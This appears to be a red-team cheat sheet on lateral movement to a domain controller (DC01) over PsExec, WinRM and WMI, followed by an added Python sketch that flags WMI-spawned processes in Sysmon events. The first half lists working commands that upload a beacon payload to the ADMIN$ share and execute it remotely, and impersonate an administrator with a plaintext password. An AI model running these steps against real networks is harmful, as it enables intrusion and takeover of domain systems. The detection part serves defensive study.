Windows Management Instrumentation (WMI)
Gain access using credentials.
jump psexec DC01 smb_listener
jump winrm64 DC01 smb_listener
Execute a command on a remote machine.
remote-exec winrm DC01 [command]
cd \\DC01\ADMIN$
upload c:\Tools\Payloads\smb_beacon_x64.exe
remote-exec wmi DC01 C:\Windows\smb_beacon_x64.exe
link DC01
CoInitializeSecurity
If the error CoInitializeSecurity already called appears when running the commands.
make_token PAY\Administrator Qwerty123
remote-exec wmi DC01 calc
We can do the following using SharpWMI.
execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=DC01 command="C:\Windows\System32\calc.exe"
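Seen from the target host, a process created over WMI runs as a child of WmiPrvSE.exe, and the upload-then-execute sequence above adds a file write under C:\Windows just before it. The following detection sketch is an added example, not part of the original notes. Assumptions: the event dictionaries are constructed and simplified from Sysmon Event ID 11 (FileCreate) and Event ID 1 (ProcessCreate), and a file written over the ADMIN$ share is logged with Image "System".

```python
from datetime import datetime, timedelta
import ntpath

# Constructed sample events, simplified from Sysmon EID 11 and EID 1 records.
SAMPLE_EVENTS = [
    {"id": 11, "time": "2024-01-01 10:00:00", "host": "DC01",
     "Image": "System", "TargetFilename": r"C:\Windows\smb_beacon_x64.exe"},
    {"id": 1, "time": "2024-01-01 10:00:40", "host": "DC01",
     "Image": r"C:\Windows\smb_beacon_x64.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"id": 1, "time": "2024-01-01 10:05:00", "host": "DC01",
     "Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"id": 1, "time": "2024-01-01 10:06:00", "host": "DC01",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def find_wmi_execution(events, window=timedelta(minutes=5)):
    """Return (severity, host, image) for each process spawned by WmiPrvSE.exe.

    Severity is 'high' when the image was written shortly before by the System
    process directly under C:\\Windows (the local path behind the ADMIN$ share),
    otherwise 'medium'.
    """
    drops = {}  # (host, lowercased path) -> time of the SMB-style file write
    findings = []
    for ev in sorted(events, key=_ts):
        if ev["id"] == 11 and ev["Image"].lower() == "system":
            path = ev["TargetFilename"].lower()
            if ntpath.dirname(path) == r"c:\windows" and path.endswith(".exe"):
                drops[(ev["host"], path)] = _ts(ev)
        elif ev["id"] == 1:
            if ntpath.basename(ev["ParentImage"]).lower() != "wmiprvse.exe":
                continue  # not a WMI-spawned process
            dropped = drops.get((ev["host"], ev["Image"].lower()))
            recent = dropped is not None and _ts(ev) - dropped <= window
            findings.append(("high" if recent else "medium", ev["host"], ev["Image"]))
    return findings

if __name__ == "__main__":
    for finding in find_wmi_execution(SAMPLE_EVENTS):
        print(finding)
```

Legitimate management tooling also spawns processes through WmiPrvSE.exe, so the medium findings need a baseline before they are alerted on.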